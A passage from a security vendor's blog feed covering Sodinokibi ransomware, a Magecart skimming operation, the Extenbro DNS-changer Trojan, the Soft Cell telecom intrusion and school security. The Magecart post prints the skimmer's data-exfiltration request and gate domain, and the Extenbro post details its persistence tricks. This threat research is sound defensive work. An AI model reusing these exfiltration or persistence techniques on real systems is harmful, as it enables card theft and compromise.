It’s a risky form of fixed-odds betting. You either win or you lose. Win, and you get a bump in your coffers. Lose, and you lose everything. They’re not allowed in the EU, which means scammers set up shop outside its borders, claiming to have base of operations in places like London and Paris, and set to work with slick, convincing adverts. As the FCA advice notes, some scammers will even manipulate the numbers in front of potential victims before swiping all the cash and vanishing into the night.

So it is into this maelstrom of potentially damaged reputations, bogus adverts, and incredibly devastating fake Bitcoin scams that Lewis and Facebook went into battle. With what he felt was a lack of responsiveness over the course of a year, off he went to try and get something done about it.

Closing time for bad ads?

In January 2019, Lewis agreed to settle out of court. By this point, Facebook had admitted there’d been “thousands” of these ads across the site. The legal settlement relied on the conditions that Facebook would donate £3 million pounds to Citizen’s Advice to create a UK Scams Action Project, and they’d also launch a UK-centric scam ad reporting tool complete with dedicated team. The donation would take the form of £2.5 million in cash over two years, with the other £500,000 covering Facebook ads presumably promoting the new services.

We have lift-off

A little later than previously advertised, the wheels have finally turned and the promises listed above have turned into tangible reality. Not only is the Scams Action page live, the rogue ad report tool is also active in the UK. Reporting an ad takes a few steps, but is clearly an improvement on no tool at all. Reporting is a case of clicking the dots above any ad, and selecting the appropriate options before sending.

Click to enlarge

Click to enlarge

There’s never been a better time to start reporting bogus ads on Facebook. If you see something that looks suspicious, by all means file a report and do your bit to help keep the most vulnerable online away from potentially life-ruining scams.

The post New Facebook ad reporting tool launches in UK appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void

Malwarebytes - Thu, 07/18/2019 - 17:58

Sodinokibi ransomware, also known as Sodin and REvil, is hardly three months old, yet it has quickly become a topic of discussion among cybersecurity professionals because of its apparent connection with the infamous-but-now-defunct GandCrab ransomware.

Detected by Malwarebytes as Ransom.Sodinokibi, Sodinokibi is a ransomware-as-a-service (RaaS), just as GandCrab was, though researchers believe it to be more advanced than its predecessor. We’ve watched this threat target businesses and consumers equally since the beginning of May, with a spike for businesses at the start of June and elevations in consumer detections in both mid June and mid July. Based on our telemetry, Sodinokibi has been on rise since GandCrab’s exit at the end of May.

Business and consumer detection trends for Sodin/REvil from May 2019 until present

On May 31, the threat actors behind GandCrab formally announced their retirement, detailing their plan to cease selling and advertising GandCrab in a dark web forum post.

“We are leaving for a well-deserved retirement,” a GandCrab RaaS administrator announced. (Courtesy of security researcher Damian on Twitter)

While many may have heaved sighs of relief at GandCrab’s “passing,” some expressed skepticism over whether the team would truly put behind their successful money-making scheme. What followed was bleak anticipation of another ransomware operation—or a re-emergence of the group peddling new wares—taking over to fill the hole GandCrab left behind.

Enter Sodinokibi

Putting a spin on an old product is a concept not unheard of in legitimate business circles. Often, spinning involves creating a new name for the product, some tweaking of its existing features, and finding new influencers—”affiliates” in the case of RaaS operations—to use (and market) the product. In addition, threat actors would initially limit the new product’s availability and follow with a brand-new marketing campaign—all without touching the product standard. In hindsight, it seems the GandCrab team has taken this route.

A month before the GandCrab retirement announcement, Cisco Talos researchers released information about their discovery of Sodinokibi. Attackers manually infected the target server after exploiting a zero-day vulnerability in its Oracle WebLogic application.

To date, six versions of Sodinokibi has been seen in the wild.

Sodinokibi versions, from the earliest (v1.0a), which was discovered on April 23, to the latest (v1.3), which was discovered July 8 Sodinokibi infection vectors

Like GandCrab, the Sodinokibi ransomware follows an affiliate revenue system, which allows other cybercriminals to spread it through several vectors. Their attack methods include:

  • Active exploitation of a vulnerability in Oracle WebLogic, officially named CVE-2019-2725
  • Malicious spam or phishing campaigns with links or attachments
  • Malvertising campaigns that lead to the RIG exploit kit, an avenue that GandCrab used before
  • Compromised or infiltrated managed service providers (MSPs), which are third-party companies that remotely manage the IT infrastructure and/or end-user systems of other companies, to push the ransomware en-masse. This is done by accessing networks via a remote desktop protocol (RDP) and then using the MSP console to deploy the ransomware.

Although affiliates used these tactics to push GandCrab, too, many cybercriminals—nation-state actors included—have done the same to push their own malware campaigns.

Symptoms of Sodinokibi infection

Systems infected with Sodinokibi ransomware show the following symptoms:

Changed desktop wallpaper. Like any other ransomware, Sodinokibi changes the desktop wallpaper of affected systems into a notice, informing users that their files have been encrypted. The wallpaper has a blue background, as you can partially see from the screenshot above, with the text:

All of your files are encrypted!
Find {5-8 alpha-numeric characters}-readme.txt and follow instructions

Presence of ransomware note. The {5-8 alpha-numeric characters}-readme.txt file it’s referring to is the ransom note that comes with every ransomware attack. In Sodinokibi’s case, it looks like this:

The note contains instructions on how affected users can go about paying the ransom and how the decryption process works.

Screenshot of the TOR-only accessible website Sodinokibi victims were told to visit to make their payments

Encrypted files with a 5–8 character extension name. Sodinokibi encrypts certain files on local drives with the Salsa20 encryption algorithm, with each file renamed to include a pre-generated, pseudo-random alpha-numeric extension that’s five to eight characters long.

The extension name and character string included in the ransom note file name are the same. For example, if Sodinokibi has encrypted an image file and renamed it to paris2017.r4nd01, its corresponding ransom note will have the file name r4nd01-readme.txt.

Sodinokibi looks for files that are mostly media- and programming-related, with the following extensions to encrypt:

  • .jpg
  • .jpeg
  • .raw
  • .tif
  • .png
  • .bmp
  • .3dm
  • .max
  • .accdb
  • .db
  • .mdb
  • .dwg
  • .dxf
  • .cpp
  • .cs
  • .h
  • .php
  • .asp
  • .rb
  • .java
  • .aaf
  • .aep
  • .aepx
  • .plb
  • .prel
  • .aet
  • .ppj
  • .gif
  • .psd

Deleted shadow copy backups and disabled Windows Startup Repair tool. Shadow copy (also known as Volume Snapshot Service, Volume Shadow Copy Service, or VSS) and Startup Repair are technologies inherent in the Windows OS. The former is “a snapshot of a volume that duplicates all of the data that is held on that volume at one well-defined instant in time,” according to Windows Dev Center. The latter is a recovery tool used to troubleshoot certain Windows problems.

Deleting shadow copies prevents users from restoring from backup when they find their files are encrypted by ransomware. Disabling the Startup Repair tool prevents users from attempting to fix system errors that may have been caused by a ransomware infection.

Other tricks up Sodinokibi’s sleeve

Ransomware doesn’t normally take advantage of zero-day vulnerabilities in their attacks—but Sodinokibi is not your average ransomware. It takes advantage of an elevated privilege zero-day vulnerability in the Win32k component file in Windows.

Designated as CVE-2018-8453, this flaw can grant Sodinokibi administrator access to the endpoints it infects. This means that it can conduct the same tasks as administrators on systems, such as disabling security software and other features that were meant to protect the system from malware.

CVE-2018-8453 was the same vulnerability that the FruitArmor APT exploited in its malware campaign last year.

New variants of Sodinokibi have also been found to use “Heaven’s Gate,” an old evasion technique used to execute 64-bit code on a 32-bit process, which allows malware to run without getting detected. We touched on this technique in early 2018 when we dissected an interesting cryptominer we captured in the wild.

Protect your system from Sodinokibi

Malwarebytes tracks Sodinokibi campaigns and protects premium consumer users and business users with signature-less detection, nipping the attack in the bud before the infection chain even begins. Users of our free version are not protected from this threat without real-time protection.

We recommend consumers take the following actions if they are not premium Malwarebytes customers:

  • Create secure backups of your data, either on an external drive or on the cloud. Be sure to detach your external drive from your computer once you’ve saved all your information, as it, too, could be infected if still connected.
  • Run updates on all your systems and software, patching for any vulnerabilities.
  • Be aware of suspicious emails, especially those that contain links or attachments. Read up on how to detect phishing attempts both on your computer and your mobile devices.

To mitigate on the business side, we also recommend IT administrators to do the following:

  • Deny public IPs access to RDP port 3389.
  • Replace your company’s ConnectWise ManagedITSync integration plug-in with the latest version before reconnecting your VSA server to the Internet.
  • Block SMB port 445. In fact, it’s sound security practice to block all unused ports.
  • Apply the latest Microsoft update packages.
  • In this vein, make sure all software on endpoints is up-to-date.
  • Limit the use of system administration tools to IT personnel or employees who need access only.
  • Disable macro on Microsoft Office products.
  • Regularly inform employees about threats that might be geared toward the organization’s industry or the company itself with reminders on how to handle suspicious emails, such as avoiding clicking on links or opening attachments if they’re not sure of the source.
  • Apply attachment filtering to email messages.
  • Regularly create multiple backups of data, preferably to devices that aren’t connected to the Internet.
Indicators of compromise (IOCs)

File hashes:

  • e713658b666ff04c9863ebecb458f174
  • bf9359046c4f5c24de0a9de28bbabd14
  • 177a571d7c6a6e4592c60a78b574fe0e

Stay safe, everyone!

The post Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void appeared first on Malwarebytes Labs.

Categories: Techie Feeds

No man’s land: How a Magecart group is running a web skimming operation from a war zone

Malwarebytes - Thu, 07/18/2019 - 15:00

Our Threat Intelligence team has been monitoring the activities of a number of threat actors involved in the theft of credit card data. Often referred to under the Magecart moniker, these groups use simple pieces of JavaScript code (skimmers) typically injected into compromised e-commerce websites to steal data typed by unaware shoppers as they make their purchase.

During the course of an investigation into one campaign, we noticed the threat actors had taken some additional precautions to avoid disruption or takedowns. As such, we decided to have a deeper look into the bulletproof techniques and services offered by their hosting company.

What we found is an ideal breeding ground where criminals can operate with total impunity from law enforcement or actions from the security community.

The setup

Using servers hosted in battle-scarred Luhansk (also known as Lugansk), Ukraine, Magecart operators are able to operate outside the long arm of the law to conduct their web-skimming business, collecting a slew of information in addition to credit card details before it is all sent to “exfiltration gates.” Those web servers are set up to receive the stolen data so that the cards can be processed and eventually resold in underground forums.

We will take you through analysis of the skimmer, exfiltration gate, and hosting servers to show how this Magecart group operates, and which measures we are taking to protect our customers.

Skimmer analysis

The skimmer is injected into compromised Magento sites and trying to pass itself for Google Analytics (google-anaiytic[.]com), a domain previously associated with the VisionDirect data breach.

Each hacked online store has its own skimmer located in a specific directory named after the site’s domain name. We also discovered a tar.gz archive perhaps left behind by mistake containing the usernames and passwords needed to login into hundreds of Magento sites. These are the same sites that have been injected with this skimmer.

Looking for additional OSINT, we were able to find a PHP backdoor that we believe is being used on those hacked sites. It includes several additional shell scripts and perhaps skimmers as well (snif1.txt):

In the next step of our analysis, we will be looking at the exfiltration gate used to send the stolen data back to the criminals. This is an essential part that defines every skimmer and can help us better understand their backend infrastructure.

Exfiltration gate

A closer look at the skimmer code reveals the exfiltration gate (google.ssl.lnfo[.]cc), which is another Google lookalike.

The stolen data is Base64 encoded and sent to the exfiltration server via a GET request that looks like this:

GET /fonts.googleapis/savePing/?hash=udHJ5IjoiVVMiLCJsb2dpbjpndWVzdCXN0Iiw{trimmed}

The crooks will receive the data as a JSON file where each field contains the victim’s personal information in clear text:

The primary target here is the credit card information that can be immediately monetized. However, as seen above, skimmers can also collect much more data, which unlike requesting a new credit card, is much more problematic to deal with. Indeed, names, addresses, phone numbers, and emails are extremely valuable data points for the purposes of identity theft or spear phishing attacks.

Panel and bulletproof hosting

A closer look at the exfiltration gate reveals the login panel for this skimmer kit. It’s worth noting that both google.ssl.lnfo[.]cc and lnfo[.]cc redirect to the same login page.

lnfo[.]cc is utilizing name services provided by 1984 Hosting, an Iceland-based hosting provider. It’s quite likely the threat actors may be taking advantage of it.

The corresponding hosting server (176.119.1[.]92) is located in Luhansk (also known as Lugansk), Ukraine.

A little bit of research on this city shows it is the capital of the unrecognized Luhansk People’s Republic (LPR), which declared its independence from Ukraine following the 2014 revolution ignited by the conflict between pro-European and pro-Russian supporters. It is part of a region also known as Donbass that has been the theater for an intense and ongoing war that has cost thousands of lives.

Amid this chaos, opportunists are offering up bulletproof hosting services for “grey projects” safe from the reach of European and American law enforcement. This is the case of bproof[.]host at 176.119.1[.]89, which advertises bulletproof IT services with VPS and dedicated servers in a private data center.

A host ripe with malware, skimmers, phishing domains

Choosing the ASN AS58271 “FOP Gubina Lubov Petrivna” located in Luhansk is no coincidence for the Magecart group behind this skimmer. In fact, on the same ASN at 176.119.1[.]70 is also another skimmer (xn--google-analytcs-xpb[.]com) using an internationalized domain name (IDN) that ties back to that same exfiltration gate.

In addition, that ASN is a hotspot for IDN-based phishing, in particular around cryptocurrency assets:

Bulletproof hosting services have long been a staple of cybercrime. For instance, the infamous Russian Business Network (RBN) ran a variety of malicious activities for a number of years.

Due to the very nature of such hosts, takedown operations are difficult. It’s not simply a case of a provider turning a blind eye on shady operations, but rather it is the core of their business model.

To protect our users against these threats, we are blocking all the domains and IP addresses we can find associated with skimmers and malware in general. We are also reporting the compromised Magento stores to their respective registrars/hosts.

Indicators of Compromise

Skimmers (hosts)
google-anaiytic[.]com (176.119.1[.]72)
xn--google-analytcs-xpb[.]com (176.119.1[.]70)

Skimmers (exfiltration gate/panel)
google.ssl.lnfo[.]cc (176.119.1[.]92)

Skimmers (JavaScript)

The post No man’s land: How a Magecart group is running a web skimming operation from a war zone appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Compromising vital infrastructure: problems in education security continue

Malwarebytes - Wed, 07/17/2019 - 14:17

The educational system and many of its elements are targets for cybercriminals on a regular basis. While education is a fundamental human right recognized by the United Nations, the financial means of many schools and other entities in the global educational system are often limited.

These limited budgets often result in weak or less-than-adequate protection against cyberthreats. Unfortunately, organizations in this industry are forced to economize and cut the costs of security.

Record keepers

Schools by nature have a lot of personal data on record—not only about their students, but in most cases, they also have records of the parents, legal guardians, and other caretakers of the children they educate. And the nature of the data—grades, health information, and social security numbers, for example—makes them extremely valuable for phishing and other social engineering attacks.

Ransomware can also have a devastating effect on educational institutions, as some of the information, like grades for example, may not be recorded anywhere else. If they are destroyed or held for ransom without the availability of backups, the results can be disastrous.

Special circumstances

Organizations in the education industry have some special circumstances to deal with when trying to protect their data and networks:

  • Many schools use special software that allows their students to log in both on premise and remotely so they can view their grades and homework assignments. These applications occasionally get hacked by students.
  • Growing networks enlarge the attack surface. Modern education requires children of young ages to learn computer skills, so many students are connected to the institution’s network at once.
  • If a tech-savvy student wants a day off, claims that he couldn’t access his homework assignments, or simply wants to brag, what’s to stop him from organizing or paying for a DDoS attack? Kids will be kids.
  • Schools often also harbor a mix of IoT and BYOD devices, which each come with their own potential problems. Some schools have noticed a spike in malware detections after holiday breaks, when infected devices get introduced back into the school environment.

The sensitive nature of the data and having an open platform for students at the same time creates a difficult situation for many educational institutions. After all, it is easy to kick in a door that is already half open— especially if there is a wealth of personally identifiable Information (PII) behind it.

The current situation

An analysis in December 2018 by SecurityScorecard ranked education as the worst in cybersecurity of 17 major industries. According to the study, the main areas of cybersecurity weaknesses in education are application security, endpoint security, patching cadence, and network security.

In our 2019 State of Malware report, we found education to be consistently in the top 10 industries targeted by cybercriminals. Looking only at Trojans and more sophisticated ransomware attacks, schools were even higher on the list, ranking as number one and number two, respectively.

So, it shouldn’t come as a surprise that according to a 2016 study entitled: The Rising Face of Cyber Crime: Ransomware, 13 percent of education organizations fall victim to ransomware attacks.

Malware strikes hard

Like many other organizations, educational institutions are under attack by the most active malware families, such as Emotet, TrickBot, and Ryuk, which wreaked havoc on organizations for the better part of the 2018–2019 school year.

Last May, the Coventry school district in Ohio had to send home its 2,000 students and close its doors for the duration of one day. The cause was probably a TrickBot infection, but the FBI is still busy with an ongoing investigation.

In February 2019, the Sylvan Union School District in California discovered a malware attack that made staff and teachers lose their connection to cloud-based data, networks, and educational platforms. Reportedly, they had to spend US$475,700 to clean up their networks.

On May 13, 2019, attackers infected the computer network of Oklahoma City Public Schools with ransomware, forcing the school district to shut down its network.

But it’s not just malware that educational institutions need to worry about. Scott County Schools in Kentucky paid US$3.7 million out to a phishing scam that posed as one of their vendors.

Unfortunately, that’s money many school districts, especially those in impoverished communities, cannot afford to pay out. So when can they do to get ahead of malware attacks before valuable data and funding fly out the bus window?

Recommended reading: What K–12 schools need to shore up cybersecurity Countermeasures

Given the complex situation and sensitive data most educational organizations have to deal with, there are a host of measures that should be taken to lower the risk of a costly incident. Recognizing that many schools must divert public funding to core curriculum, our recommendations represent a baseline level of protection districts should strive toward with limited resources.

  • Separate educational and organizational networks, with grades and curriculum in one place, and personal data in another. By using this infrastructure, it will be harder for cybercriminals to access personal data by using leaked or breached student and teacher accounts.
  • DDoS protection. DDoS attacks are so cheap ($10/hour) nowadays, that anyone with a grudge can have an unprotected server taken down for a few days without spending a fortune. The possible scope of DDoS attacks has been increased significantly, now that attackers have started using Memcached-enabled servers. To put a stop to outrageously-large DDoS attacks, those servers should not be Internet-facing.
  • Educate staff and students about the dangers they are facing and the possible consequences of not paying enough attention. Teachers can absorb cybersecurity education into reading comprehension lessons, and staff could benefit from awareness training during professional development days.
  • Lay out clear and concise regulations for the use of devices that belong to the organization and the way private devices are allowed to be used on the grounds.
  • Backups should be up-to-date and easy to deploy. Ransomware demands are high and even when you pay them, there is always the chance the decryption may fail—or never existed in the first place.
  • Investing in layered protection may seem costly, but compared to falling victim to malware or fraud, the investments is worth it.

In fact, all of these measures will cost money and we realize that will need to come out of a tight budget. But funding, or the lack thereof, can not be an excuse for weak security. Cybercrime is one of the biggest chunks of the modern economy. And guess who’s paying for most of that? Those who didn’t invest enough in security.

What a strange paradox that one of the best weapons against cybercrime is education, but that organizations in education have the biggest problems with security. We at Malwarebytes, with the help of educational leaders, aim to change that.

Stay safe, everyone!

The post Compromising vital infrastructure: problems in education security continue appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hi, honey. It’s mom. My phone is acting funny again.

Malwarebytes - Tue, 07/16/2019 - 17:14

Whether it’s setting up access to a Netflix account on a smart TV or enabling personal email on an iPhone, some people—of all ages—have a hard time figuring out user-friendly technology. However, often times it’s older generations that have to turn to their progenitors for everything from uploading pictures to the cloud to deciding whether it’s safe to open an attachment.

Despite results from a 2018 study from the Pew Research Center, which found that there has been “significant growth in tech adoption in recent years among older generations—particularly Gen Xers and Baby Boomers,” Millennials and Gen Zs field many “how do I?” technology questions from their aging parents.

While older generations are embracing technology, such as smart phones and smart TVs, the constant need to update “can be difficult for seniors to keep up with,” according to Senior Living. “Often seniors need help from caregivers or cell phone technicians to understand new features to their devices.”

The frustration from older users over rapidly-evolving new technology, updates to software, and a laundry list of security best practices to keep track of—like needing 27 different passwords—can lead to tech and security fatigue, which causes users to bury their heads in the sand instead of having to keep up with it all. What’s easier, then, is calling up a younger friend or family member for help.

That’s all well and good, but do younger generations always know the right thing to do? And are they sick of serving as the family IT guy? How can disparate generations reconcile their relationship with technology and with each other while still staying safe?

My phone is acting weird

When seniors experience user challenges, they most often turn to the Internet or their families for tech support, according to 2019 Link-Age Connect Technology Study. Nicolas Poggi, who works for a software security firm in Santiago, Chile, agreed, explaining that his 54-year-old mother is constantly reaching out with questions about her phone.

“I think the main thing that keeps coming up is the fear that everything has a virus in it,” Poggi said. “I usually get a call or a sneaky message from Mom saying, ‘Hey, I think my phone has a virus or something. It’s acting odd, can you give me a hand?'”

Sometimes the problem is one of misconfigurations. “She’s misconfigured half of her settings by accident and the other half trying to fix the initial misconfigurations,” Poggi said, adding that his greatest technology concerns for his mother are privacy and security.

Yes, privacy and security are important concerns for most technology users, but Linkage Connect explained that when it comes to the elderly, “the biggest barriers that keep them from adopting new technology today are the complexity, understanding it all, the cost, and having no easy way to learn it.”

Scammers target older users

Verizon’s 2019 Data Breach Report found that 32 percent of data breaches involved phishing, where cybercriminals send emails pretending to be from reputable companies to coax people into revealing personal information, such as passwords and credit card numbers. Not surprisingly, young people are concerned that their aging parents could easily fall victim to a phish or some other type of fraudulent scam, especially because scammers are keen to target older users, whom they believe to be more vulnerable.

When asked about her perceived ability to detect fraud and scams, Poggi’s mom said, “I think there are obvious ones, like the email ones or those images that promise to make you a millionaire. Aside from that, I don’t really know what other types of scams are out there. It worries me that I don’t know what to look out for. I know how to keep my social media private, but I don’t really know who is looking at what or where.”

Poggi agrees with his mother’s assessment, but worries that the areas where she lacks awareness could lead to compromise.

“I don’t think their generation adopted technology in the way we have,” said Poggi. “They are way behind with best practices. Basic things like password hygiene, phishing, fake websites, fake offers, still get to them. Still, they seem to have adopted enough technology to make for an awfully dangerous combination: a lack of security plus online banking plus social media.”

I love my phone! I hate my phone!

Older generations are increasingly becoming major consumers of connected devices. In fact, 94 percent of Americans over the age of 50 use technology to stay connected with their friends and family members, according to the 2019 Tech and the 50+ Survey published by AARP.

Yet, many in the 50+ age group have a love-hate relationship with technology. The Linkage Connect survey covered a wide swath of participant ages—nearly half a century, actually. Some said they had no use for technology. Others said they couldn’t imagine life without it. Most respondents appreciated being able to use technology but found the learning curve frustrating.

“Finding time to learn to use and to fix technology is the biggest problem,” said one woman in the 75–79 age range.

A woman nearly 10 years her senior said, “I find it frustrating when setting up a new electronic device such as a printer, computer, phone, etc. Instructions are supposed to be simple, but there always seems to be something missed. Need a person to walk me through it.”

While others noted their reliance on family to help them navigate the complexities of their connected devices, one woman in her sixties said, “I find it interesting, but the advancements come so rapidly, it is hard to keep up. And the expense is ridiculous.”

Though technology admittedly makes some aspects of life simpler, another 75–79 year old woman said, “At times, I feel that if I have to learn one more thing I will scream, but it is keeping me current with the world.”

Convenience, affordability, and simplicity

According to AARP, technologies targeting, “the health, wellness, safety, and vitality of adults 50-plus are proliferating.” Technology innovators obviously crunched the numbers from the Census Bureau in preparation for January’s CES 2019 in Las Vegas, where many of the devices introduced for older generations ranged from awesome to odd.

As people age, however, they want to make things simpler. Simplicity and ease of use should be the goal of technologies and devices that are designed for older generations. The Linkage Connect study noted that, “With the 50+ population representing approximately 115 million in the United States alone today and the expectation for that number to reach 132 million by 2030 (from the US Census Bureau), it is now more important than ever to understand the older adult consumer.”

No one wants to fumble through learning how to use a connected device. If it’s too challenging, it’s useless. Asking for help can be embarrassing for older generations who have to turn to their children or grandchildren to learn how to use a new gadget, which is one reason why the American Society on Aging advised, “It is imperative that in addition to making technology more intuitive for older adults, training older adults in how to use technology must be a national priority.”

What’s important to remember is that education needs to be accessible and personal—at any age. In order to enable adoption that improves the lives of elders, manufacturers, and younger helpers, need to meet them where they are.

“They want to learn ‘hands on’ with others. Teaching older adults how to use these devices, in the manner in which they want to learn, could prove to benefit them as they age,” the Linkage Connect study said.

Older adults who feel overwhelmed should feel free to take the initiative to ask for help. And younger family members or friends should be patient and take a beat to not only fix the problem, but walk people through it. In the end, both generations can benefit from the extra security awareness practice.

The post Hi, honey. It’s mom. My phone is acting funny again. appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Meet Extenbro, a new DNS-changer Trojan protecting adware

Malwarebytes - Mon, 07/15/2019 - 14:54

Recently, we uncovered a new DNS-changer called Extenbro that comes with an adware bundler. These DNS-changers block access to security-related sites, so the adware victims can’t download and install security software to get rid of the pests.

From our viewpoint, this might be like sending in an elephant to save the mosquito, but the threat actors behind this attack have been known to use aggressive tactics in the past. What do they care if they open up your machine to all kinds of threats by disallowing you access to security sites and blocking any existing security software from getting updates? They just want to serve you adware.

Unfortunately, we have seen this kind of behavior before. But since this one uses a few fancy tricks, we’ll give you a quick overview of what it does and how you can get rid of it. For those just looking for a quick fix, there is a removal guide on our forums.

Infection vector

We have noticed the Extenbro Trojan is delivered on systems by a bundler that is detected by Malwarebytes as Trojan.IStartSurf.


First and foremost, the Trojan changes the DNS settings of the infected system so it won’t be able to reach any security vendors’ sites.

New for this one is that you have to access the Advanced DNS tab to find out that it has added four DNS servers rather than the usual two. Where people might be inclined to change the two that are visible, use the Advanced button and look at the DNS tab: It would cause them to leave the additional two behind.

Task Scheduler

Should you manage to correct the offending DNS servers and reboot the system before taking further measures, you will find that the DNS settings re-appear after a reboot. This is because of a randomly-named Scheduled Task that looks similar to this:

The location of the folder and the switches for the command seem to be fixed, but the folder name and file name are random.

Root certificate

The Trojan also adds a certificate to the set of Windows Root certificates.

Using the method outlined in the blog post Learning PowerShell: some basic commands, I established that the certificate has no “Friendly Name” and is supposedly registered to abose[at]reddit[dot]com.

Disables IPV6

By changing the registry value DisabledComponents under the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPIP6\Parameters and setting the value to “FF”, the Trojan disables IPV6 to force the system to use the new DNS servers.


The malware also makes a change in the Firefox user.js file and sets the security.enterprise_roots.enabled setting to true, which Configures Firefox to use the Windows Certificate Store where the newly-added root certificate was added.

Removal instructions

Some of the changes that this malware makes could already be in place, if they are the user’s preferred settings. So feel free to skip the steps that you are not comfortable with.

What really needs to be done so you can download a removal tool or update you existing security software is to restore the DNS servers to what they were—or, if you don’t know the previous settings, to something safe. Most ISPs have the preferred DNS servers listed in their installation instructions or on their website. That is the first place to look. If you can’t find them there, you can use the DNS servers provided by OpenDNS. You can find instructions for many Operating Systems on their site.

An extra step needs to be taken when you are in this screen:

Make sure to click on Advanced…and select the DNS tab to find the extra two DNS servers that we mentioned earlier. Remove those before you change the two shown on the screen to your preferred ones.

Now, you should be able to visit security sites again. Follow the remaining instructions below:

  • To get to your security sites, you may need a restart of the browser. Do NOT reboot your system or the DNS servers might be changed for the worse again by the Scheduled Task that belongs to the Trojan. If your existing solution does not pick up on the malware, download  Malwarebytes to your desktop.
  • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
  • Then click Finish.
  • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
  • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
  • When the scan is complete, make sure that All Threats are selected, and click Remove Selected.
  • Restart your computer when prompted to do so.
  • This procedure should take care of the Scheduled Task and the Root certificate.
  • If you want to undo the change that makes FireFox adhere to the Windows certificates, you can open Firefox and type about:config in the address bar. Then read and accept the “risk” and search for security.enterprise_roots.enabled. The default settings is false. You can change the setting by selecting the line and right clicking it to get a menu. Clicking Toggle changes the value back and forth between True and False. Close the about:config tab when you are done.

Should you need further help, feel free to reach out to us on the forums or by contacting our support department.


DNS servers:


SHA256 b2a28e9abb04a5926d53850623b1f3c6738169b27847e90c55119f2836c17006

Root certificate:


Stay safe, everyone!

The post Meet Extenbro, a new DNS-changer Trojan protecting adware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 8 – 14)

Malwarebytes - Mon, 07/15/2019 - 14:27

Last week on Malwarebytes Labs, we looked at ways to send your sensitive information in a secure fashion, examined some tactics in incident response land, and explored federal data privacy law. We also looked at how security tools can turn against you, and took a deep dive into the rather fiendish Soft Cell attack.

Other cybersecurity news
  • The UK government backs facial recognition tech: The controversial trials received the backing of the British government’s home secretary. (Source: BBC)
  • Who watches the Watchmen: British police officer misuses database. (Source: The Register)
  • Zoom zero-day lurches into view: Researchers report a bug which leaves Mac users susceptible to webcam hijacks. (Source: ThreatPost)
  • Listen closely: Google contractors can listen to Google Home audio clips. (Source: Sophos’s Naked Security Blog)
  • Agent Smith on the prowl: Android malware capable of replacing code with its own malicious wares found on more than 25 million devices. (Source: The Verge)
  • TrickBot is what’s hot: The timeless “classic” returns with a few new tricks up its sleeve, including some cunning spam antics. (Source: TechCrunch)
  • Pale Moon rising: Old versions of the popular browser found to be infected with malware. (Source: ZDNet)
  • Phish attacks are never far: A recent study revealed that one in 99 emails are classified as phishing. Here’s a good look at costs and some additional statistics. (Source: Small Business Trends)
  • Beware of whales: Ship operators are warned by the US coast guard to be on the lookout for targeted spear phishing attempts. (Source: Computing News)
  • Amazon is a Prime target: Beware of smart phishing scams looking to bait those looking for a bargain on Prime Day. (Source: Wired)

Stay safe, everyone!

The post A week in security (July 8 – 14) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cellular networks under fire from Soft Cell attacks

Malwarebytes - Fri, 07/12/2019 - 15:30

We place a lot of trust in our mobile experience, given they’re one of the most constant companions we have. Huge reams of data, tied to a device we always carry with us, with said device frequently offering additional built-in app functionality. An astonishing wealth of information, for anyone bold enough to try and take it.

Security firm Cybereason uncovered an astonishing attack dubbed “Operation soft cell” haunting at least ten cellular networks based around the globe. Over the course of seven years, they went after all manner of detailed information on just 20 to 30 targets, feeding it back to base and building up an amazingly detailed picture of their daily dealings.

What happened here?

The compromise, which the researchers have given a high probability of being a nation-state attack, went to elaborate lengths to nab their high value targets. Attackers first gained a foothold by targeting a web-connected server and making use of an exploit to gain access. A shell would then be placed to enable further unauthorised activity.

In this particular case, a modified version of the well-known China Chopper was deployed to carry out specific tasks. It’s quite flexible, able to run on multiple server platforms. It’s also quite old, dating back several years. I guess there’s no tunes quite like the classics.

Thanks to China Chopper and a variety of alternative compromise tools, the attackers would make use of credentials from the first machine to dig deeper in the network. Well-worn RATs like PoisonIvy were used to ensure continued access on compromised devices.

Eventually, they’d gain control of the Domain Controller and at that point,  it’s essentially game over for the targeted organisation.

Groundhog Day

It appears the criminals reused various techniques to work their way around the various cellular networks, with little resistance. Talk about “If it ain’t broke, don’t fix it.” So total was their ownership of certain organisations, they were able to set up VPN services to enable quick, persistent access on hijacked networks instead of taking the much slower route and connecting their way through multiple compromised servers.

If they were worried about being caught in the act, they certainly didn’t show it. In fact, from reading the main report it seems in cases where there was some pushback, they simply looped back around and tried again till they succeeded, attacking in waves staggered over a period of months.

The Crown Jewels

Most of the time, attacks on web-facing servers result in an email from Have I been pwned and you see which bits of personal information have been fired across the web this time. Not here, however—it was never going to end with a username/password dump.

The attackers plundered cellular networks, gained access to pretty much everything you could think of. In cases where the target was fully compromised, all username/passwords were grabbed, along with billing information and various smatterings of personal data.

However, the big prize here wasn’t being able to hurl all of this onto a Pastebin or upload it to social media as a free-for-all; nothing so bland. It was, instead, being able to sit on both this data quietly alongside hundreds of gigabytes of call detail records. This is, as you’ll see, a bad thing.

Call detail records: What are they?

Good question.

Call detail records are all about metadata. They won’t give you the contents of the call itself, but what they will give you is pretty much everything else. They’re useful for a variety of things: billing disputes, law enforcement inquiries, tracking people down, bill generation, call volumes/handling for businesses and much more. Not only do they avoid recordings of conversations, they also steer clear of specific location information.

Nonetheless, patterns of behaviour are easy to figure out. A typical CDR could include:

  • Caller
  • Recipient
  • Start/end time of call
  • Billing number
  • Voice/SMS/other
  • A specific number used to identify the record in question
  • How the call entered/exited the exchange

If you’re looking to target specific individuals, then this data over time is an incredible resource for an attacker to get hold of. Some may prefer the old spear phish/malware attachment type scenario, but by going after the target directly, it’s quite possible someone’s going to find out. Where targets are high value, they’ll almost certainly have additional security measures in place. For example, journalists who cover human rights abuses in dangerous parts of the world will often work with organisations who keep an eye out for potential attacks.

This method, aimed at slowly digging around behind the scenes and out of view from whoever happens to be using those networks, is much sneakier. Depending on how things pan out, it’s entirely possible they’d never even know they’d been compromised by proxy in the first place.

Hidden in plain sight

